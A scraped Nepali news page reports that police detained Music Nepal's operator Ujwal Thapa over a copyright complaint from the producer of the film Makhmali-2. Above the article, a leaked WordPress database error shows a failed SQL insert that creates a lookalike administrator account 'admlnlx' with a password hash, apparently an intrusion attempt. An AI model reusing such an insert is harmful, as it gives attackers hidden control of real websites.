WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0A80qxZD9aOjYFyadnmDRK845uhub1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 16:16:39', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, काठमाडाैं । म्युजिक नेपालका सञ्चालक उज्वल थापालाई प्रहरीले नियन्त्रणमा लिएको छ । प्रतिलिपि अधिकार मुद्दामा उनीविरुद्ध उजुरी परेपछि प्रहरीले सोधपुछका लागि नियन्त्रणमा लिएको महानगरीय प्रहरी परिसरका प्रवक्ता होविन्द्र बोगटीले बताए । नियन्त्रणमा लिएका थापासँग सोधपुछ भइरहेको प्रहरीले श्रोतले जनाएकाे छ ।
चलचित्र मखमली–२ की निर्मात्री धनमाया सिलवालले थापाविरुद्ध उजुरी गरेपछि उनी पक्राउ परेका हुन्। थापाले छायांकनमा रहेको चलचित्रको गीतलाई आफैले म्यूजिक भिडियो बनाएर युट्युबमा हालेको निर्मात्री सिलवालले आरोप लगाएकी छन् ।
sourse:nagariknews